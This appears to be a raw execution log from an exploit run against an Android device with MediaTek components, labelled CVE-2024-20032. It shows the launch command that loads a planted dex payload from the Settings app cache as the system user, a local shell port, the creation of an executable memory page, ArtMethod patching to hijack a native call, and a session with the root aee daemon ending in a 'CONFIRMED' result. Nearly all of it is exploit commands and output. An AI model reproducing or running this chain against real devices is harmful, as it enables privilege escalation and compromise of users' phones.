command=CLASSPATH=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex app_process64 /system/bin AeeSessionProbe --socket=com.mtk.aee.aed_64 --ind=11 --class=3 --payload
probe=aee-session
dex_md5=61393975478c0a3b088c43fa18fd1f78
dex_sha256=312adad179943ca42c67f1df12719386c9b4dc1b8e56b0984cd283f2852146d5
remote_dex=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
61393975478c0a3b088c43fa18fd1f78  /data/data/com.android.settings/cache/apusys_ioctl_probe.dex
[AeeSessionProbe] CVE-2024-20032 session driver
[AeeSessionProbe] uid=1000 pid=23439 target_pid=23439 class=3 ind=11 flags=0x0 payload=true
[+] Scratch buffer at 0x7134fbc000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x7134fbb000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x712ea37a20
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x6e7941a2c0
    entry_point    = 0x103800087733c368
[*] Patching data_ (JNI) → 0x7134fbb000
    data_       = 0x7134fbb000 ✓
    entry_point = 0x103800087733c368 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[session] @com.mtk.aee.aed_64 connected peer_uid=0
[session] IND ind=11 class=3 pid=23439 flags=0x0 payload=18
[session] IND bytes: 02 00 00 00 0b 00 00 00 8f 5b 00 00 03 00 00 00 12 00 00 00 00 00 00 00
[session] REQ#0 type=0 cmd=2(REQ_TYPE) seq=0 payload=0
[session] read timeout after 1 reqs
[session] *** SUCCESS: 1 REQ/RSP exchanges on @com.mtk.aee.aed_64 ***
[result] CVE_2024_20032=CONFIRMED — system_app drove full session with root aee daemon
%n[phase-check] /data/vendor/aee_exp/
[aee_exp] empty
